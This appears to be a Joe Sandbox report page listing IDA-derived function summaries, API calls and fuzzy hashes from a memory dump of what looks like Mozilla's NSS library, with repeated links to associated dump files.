Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
String ID:
API String ID: 754562246-0
Opcode ID: 0d3171cf3d5c51d874be5923c320d3f63d4b85616d75eed6bd2f7972c28a1360
Instruction ID: 98b1c6d81316ddb26b7e2557ea5a9e69b830579ed326169c9617a3741e758de9
Opcode Fuzzy Hash: 0d3171cf3d5c51d874be5923c320d3f63d4b85616d75eed6bd2f7972c28a1360
Instruction Fuzzy Hash: 6D018167B0811957E721916CEE86AEB32988B9765DF080C31E909D7F41F616DD0D82E2

Function 6C90ADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(6C90A6D8), ref: 6C90AE0D
free.MOZGLUE(?), ref: 6C90AE14
DeleteCriticalSection.KERNEL32(6C90A6D8), ref: 6C90AE36
free.MOZGLUE(?), ref: 6C90AE3D
free.MOZGLUE(00000000,00000000,?,?,6C90A6D8), ref: 6C90AE47

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: 9baedbab5cf04197d0d5ed2f5414889d478aa6e4d98b1bce02faa85a6f648b57
Instruction ID: be66c24e443471e5f1a956857de962a3c2377564aee08d86afca0ba4780c1745
Opcode Fuzzy Hash: 9baedbab5cf04197d0d5ed2f5414889d478aa6e4d98b1bce02faa85a6f648b57
Instruction Fuzzy Hash: 2FF09675201A01ABCF10AF68D808957777CBF867B9724432CE52A83940E731E119C7D5

Function 6C786C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C786D36

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C786D20
%s at line %d of [%.10s], xrefs: 6C786D2F
database corruption, xrefs: 6C786D2A

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 6dab61949bdd047615e5016f831f46bbf4cb294e41fba74ad36e4536548b0f1d
Instruction ID: 78ab386a2182b0fe17a43e2f171ea68e8da8e79c50df47096267ff8e42fd00ef
Opcode Fuzzy Hash: 6dab61949bdd047615e5016f831f46bbf4cb294e41fba74ad36e4536548b0f1d
Instruction Fuzzy Hash: AF212430610304ABCB20CF19CA46B5AB7F2AF80308F14853CD9499BF51E371FA4887A2

Function 6C8BCC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6C8BCD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C8BCC7B), ref: 6C8BCD7A
Part of subcall function 6C8BCD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C8BCD8E
Part of subcall function 6C8BCD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C8BCDA5
Part of subcall function 6C8BCD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C8BCDB8

PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C8BCCB5
memcpy.VCRUNTIME140(6C9514F4,6C9502AC,00000090), ref: 6C8BCCD3
memcpy.VCRUNTIME140(6C951588,6C9502AC,00000090), ref: 6C8BCD2B

Part of subcall function 6C7D9AC0: socket.WSOCK32(?,00000017,6C7D99BE), ref: 6C7D9AE6
Part of subcall function 6C7D9AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C7D99BE), ref: 6C7D9AFC

Part of subcall function 6C7E0590: closesocket.WSOCK32(6C7D9A8F,?,?,6C7D9A8F,00000000), ref: 6C7E0597

Strings

Ipv6_to_Ipv4 layer, xrefs: 6C8BCCB0

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
String ID: Ipv6_to_Ipv4 layer
API String ID: 1231378898-412307543
Opcode ID: d42233d4f4b97c35aafc54cc045b4b04ea83e8a93b2f26dd592ae46393517dfc
Instruction ID: 545c3690bf0a3350ccfc1938b6073aa92b6096ad39a9583e5d5004f28850c0c1
Opcode Fuzzy Hash: d42233d4f4b97c35aafc54cc045b4b04ea83e8a93b2f26dd592ae46393517dfc
Instruction Fuzzy Hash: 551193F2B083409EDB009F698906B423AB8A35B318FA4252DE516DBB45E771D8058BD1

Function 6C8B4FF0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,?,?,00000001,?,6C7985D2,00000000,?,?), ref: 6C8B4FFD
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8B500C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8B50C8
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8B50D6

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: _byteswap_ulong
String ID:
API String ID: 4101233201-0
Opcode ID: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction ID: 848a389e9cc816b6959046d45d0c444210e8493f420b5b4794ab9959bffc71e2
Opcode Fuzzy Hash: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction Fuzzy Hash: 1C415CB2A002158BCB18CF18DCD179AB7E1BF5831871D4A6DD84ADBB02E375E891CB81

Function 6C840420 Relevance: 6.1, APIs: 4, Instructions: 117memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000000,?,6C82C97F,?,?,?), ref: 6C8404BF
TlsGetValue.KERNEL32(00000000,?,6C82C97F,?,?,?), ref: 6C8404F4
EnterCriticalSection.KERNEL32(?,?,?,6C82C97F,?,?,?), ref: 6C84050D
PR_Unlock.NSS3(?,?,?,?,6C82C97F,?,?,?), ref: 6C840556

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Alloc_CriticalEnterSectionUnlockUtilValue
String ID:
API String ID: 349578545-0
Opcode ID: 1c4dc026c8b550488b0eb2571cfb43f3311f8285aa4631ee854f2f576a1f329d
Instruction ID: 8f10566a7c1933966067f5619d1bdec49f8a19ab9baa7e1dc443af3abb1e9fc7
Opcode Fuzzy Hash: 1c4dc026c8b550488b0eb2571cfb43f3311f8285aa4631ee854f2f576a1f329d
Instruction Fuzzy Hash: A9418071A0564ACFDB14DF29C64066ABBF4FF54318F15C92DD8A99BB01E730E491CB80

Function 6C862C80 Relevance: 6.1, APIs: 4, Instructions: 105COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE002,00000000,?,6C861289,?), ref: 6C862D72

Part of subcall function 6C863390: PORT_ZAlloc_Util.NSS3(00000000,-0000002C,?,6C862CA7,E80C76FF,?,6C861289,?), ref: 6C8633E9
Part of subcall function 6C863390: PORT_ZAlloc_Util.NSS3(0000001C), ref: 6C86342E

PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C861289,?), ref: 6C862D61

Part of subcall function 6C860B00: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C860B21
Part of subcall function 6C860B00: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C860B64

PR_SetError.NSS3(FFFFE02D,00000000,?,?,?,?,6C861289,?), ref: 6C862D88
PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6C861289,?), ref: 6C862DAF

Part of subcall function 6C81B8F0: PR_CallOnceWithArg.NSS3(6C952178,6C81BCF0,?), ref: 6C81B915
Part of subcall function 6C81B8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000001,?), ref: 6C81B933
Part of subcall function 6C81B8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,?), ref: 6C81B9C8
Part of subcall function 6C81B8F0: SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6C81B9E1

Part of subcall function 6C860A50: SECOID_GetAlgorithmTag_Util.NSS3(6C862A90,E8571076,?,6C862A7C,6C8621F1,?,?,?,00000000,00000000,?,?,6C8621DD,00000000), ref: 6C860A66

Part of subcall function 6C863310: SECOID_GetAlgorithmTag_Util.NSS3(?,00000000,FFFFFFFF,?,6C862D1E,?,?,?,?,00000000,?,?,?,?,?,6C861289), ref: 6C863348

Part of subcall function 6C8606F0: PORT_ZAlloc_Util.NSS3(0000000C,00000000,?,6C862E70,00000000), ref: 6C860701

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Util$AlgorithmAlloc_ErrorK11_Tag_$Item_Tokens$AllocCallFreeOnceWithZfree
String ID:
API String ID: 2288138528-0
Opcode ID: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
Instruction ID: bcc9637bfd612b074cbfa9a7d18747cb2d26cc78af35dffb34bb5d3e0ea060e1
Opcode Fuzzy Hash: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
Instruction Fuzzy Hash: 46312BB2D002056BDB205E69EE40F9A3765BF4531EF140970EC145BF91E731E918C7A2

Function 6C7F6C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C7F6C8D
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C7F6CA9
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C7F6CC0
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C918FE0), ref: 6C7F6CFE

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Util$Alloc_Arena$EncodeItem_memset
String ID:
API String ID: 2370200771-0
Opcode ID: f445b86da2f2948f39053167d22a64fb1092528b97b7582bde6a1b985d6dada6
Instruction ID: 6c1618d0c21e3bfa44e67a9bc2bd4db675823ca4d132a0ad1096284c4184aa65
Opcode Fuzzy Hash: f445b86da2f2948f39053167d22a64fb1092528b97b7582bde6a1b985d6dada6
Instruction Fuzzy Hash: B331A3B1A012169FDB08CF65C992ABFBBF5EF45248B10443DD955D7700EB31D906CBA0

Function 6C904F00 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000003,00000000,?,?,00000000), ref: 6C904F5D
free.MOZGLUE(?), ref: 6C904F74
free.MOZGLUE(?), ref: 6C904F82
GetLastError.KERNEL32 ref: 6C904F90

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: free$CreateErrorFileLast
String ID:
API String ID: 17951984-0
Opcode ID: 8dff5095ab688a4f1d4aa15f24ae58e8e10651273b7d960b073e434c294b532b
Instruction ID: ec0391f4de6bc5909cc6e213cf27db35f594c288997010bc2e0f6cbfc1b0586c
Opcode Fuzzy Hash: 8dff5095ab688a4f1d4aa15f24ae58e8e10651273b7d960b073e434c294b532b
Instruction Fuzzy Hash: D23104B5B042094FEB01DF69DC85BDAB3B8EF45358F04422DE915E7781EB34E9248AA1

Function 6C866DE0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

PR_MillisecondsToInterval.NSS3(?), ref: 6C866E36
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C866E57

Part of subcall function 6C89C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C89C2BF

PR_MillisecondsToInterval.NSS3(?), ref: 6C866E7D
PR_MillisecondsToInterval.NSS3(?), ref: 6C866EAA

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: IntervalMilliseconds$ErrorValue
String ID:
API String ID: 3163584228-0
Opcode ID: 8afc9a7137a7212dceb8a84552602fee98eec0c560bed613c537c4a1f1db6c7b
Instruction ID: 13034b757db06d2c0b9ef2f31785e5ecbc2233068b24e3fdf401758d47e1d5e0
Opcode Fuzzy Hash: 8afc9a7137a7212dceb8a84552602fee98eec0c560bed613c537c4a1f1db6c7b
Instruction Fuzzy Hash: 0C31BF72610696EADB341E36CA04396B7A5AB0131AF340E3DD499D6F80EB317454CB81

Function 6C7F6420 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000,00000001,00000000,00000000,?,?,6C7F5DEF,?,?,?), ref: 6C7F6456
CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001,00000001,00000000,00000000,?,?,6C7F5DEF,?,?,?), ref: 6C7F6476
CERT_DestroyCertificate.NSS3(00000000,?,?,?,?,?,?,6C7F5DEF,?,?,?), ref: 6C7F64A0
PR_SetError.NSS3(FFFFE020,00000000,00000001,00000000,00000000,?,?,6C7F5DEF,?,?,?), ref: 6C7F64C2

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: CertificateError$DestroyTemp
String ID:
API String ID: 3886907618-0
Opcode ID: 69f7a8026667b2e723c64be03bd8d7d7b0b57e47e95c4ffce8af3ad3ba9e6179
Instruction ID: 6ad431655fdfe58e7cf77b60d44d343d658b878be78bc95ef957a71297c28b0d
Opcode Fuzzy Hash: 69f7a8026667b2e723c64be03bd8d7d7b0b57e47e95c4ffce8af3ad3ba9e6179
Instruction Fuzzy Hash: D921EE719002016BEB206E6CDD89B7376E8AB40318F144538F579C6B81E7B2D755C751

Function 6C834FB0 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6C83B60F,00000000), ref: 6C835003
EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6C83B60F,00000000), ref: 6C83501C
PR_Unlock.NSS3(?,?,?,00000000,00000000,00000000,?,6C83B60F,00000000), ref: 6C83504B
free.MOZGLUE(?,00000000,00000000,00000000,?,6C83B60F,00000000), ref: 6C835064

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValuefree
String ID:
API String ID: 1112172411-0
Opcode ID: cb82e22d3cecb67ecb512c2fdeb4ce452ae14e09ce8ab993ef1aed28d1b45626
Instruction ID: e63d58c61e9d2f0c4901785317ce18a6945d2a97b688664213702f6f34a222a1
Opcode Fuzzy Hash: cb82e22d3cecb67ecb512c2fdeb4ce452ae14e09ce8ab993ef1aed28d1b45626
Instruction Fuzzy Hash: 2C3148B0A05716CFCB10EFA8C58456ABBF4FF49308B149929D899D7700E735E994CBD1

Function 6C844590 Relevance: 6.1, APIs: 4, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000008,?,6C84473B,00000000,?,6C837A4F,?), ref: 6C84459B

Part of subcall function 6C850BE0: malloc.MOZGLUE(6C848D2D,?,00000000,?), ref: 6C850BF8
Part of subcall function 6C850BE0: TlsGetValue.KERNEL32(6C848D2D,?,00000000,?), ref: 6C850C15

TlsGetValue.KERNEL32(?,?,6C84473B,00000000,?,6C837A4F,?), ref: 6C8445BF
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C84473B,00000000,?,6C837A4F,?), ref: 6C8445D3
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,6C84473B,00000000,?,6C837A4F,?), ref: 6C8445E8

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Value$Alloc_CriticalEnterSectionUnlockUtilmalloc
String ID:
API String ID: 2963671366-0
Opcode ID: a2129d4508a5c1289e5ff20511964f42a51a5c25c54d0e7bb24d8eb9509665e1
Instruction ID: 9d5cdc709394cf7995cd6d0331e1cc477626b6d4e0fb0ea1a1d3c5624be1f5f3
Opcode Fuzzy Hash: a2129d4508a5c1289e5ff20511964f42a51a5c25c54d0e7bb24d8eb9509665e1
Instruction Fuzzy Hash: AF21DAB0A0060AAFEB10AF69DE4456ABBB4FF89319F108939D848D7711E731E954CBD1

Function 6C7E04D0 Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(?,?), ref: 6C7E04F1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C7E053B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C7E0558
GetLastError.KERNEL32 ref: 6C7E057A

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorFileHandleInformationLast
String ID:
API String ID: 3051374878-0
Opcode ID: 599062c754a3230747fd240a9ecaa5531e579b9b9960abfa45808bf50bed1789
Instruction ID: a60bdc11dc4593ef56b66a000bb3a97eef3c874b7360dcf5a4702014a34a186e
Opcode Fuzzy Hash: 599062c754a3230747fd240a9ecaa5531e579b9b9960abfa45808bf50bed1789
Instruction Fuzzy Hash: 89215071A001189FDB14DF59DD94AAEB7B8FF49308B108429E809DB351DB31ED05CB90

Function 6C862DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C862E08

Part of subcall function 6C8514C0: TlsGetValue.KERNEL32 ref: 6C8514E0
Part of subcall function 6C8514C0: EnterCriticalSection.KERNEL32 ref: 6C8514F5
Part of subcall function 6C8514C0: PR_Unlock.NSS3 ref: 6C85150D

PORT_NewArena_Util.NSS3(00000400), ref: 6C862E1C
PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6C862E3B
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C862E95

Part of subcall function 6C851200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C7F88A4,00000000,00000000), ref: 6C851228
Part of subcall function 6C851200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C851238
Part of subcall function 6C851200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C7F88A4,00000000,00000000), ref: 6C85124B
Part of subcall function 6C851200: PR_CallOnce.NSS3(6C952AA4,6C8512D0,00000000,00000000,00000000,?,6C7F88A4,00000000,00000000), ref: 6C85125D
Part of subcall function 6C851200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C85126F
Part of subcall function 6C851200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C851280
Part of subcall function 6C851200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C85128E
Part of subcall function 6C851200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C85129A
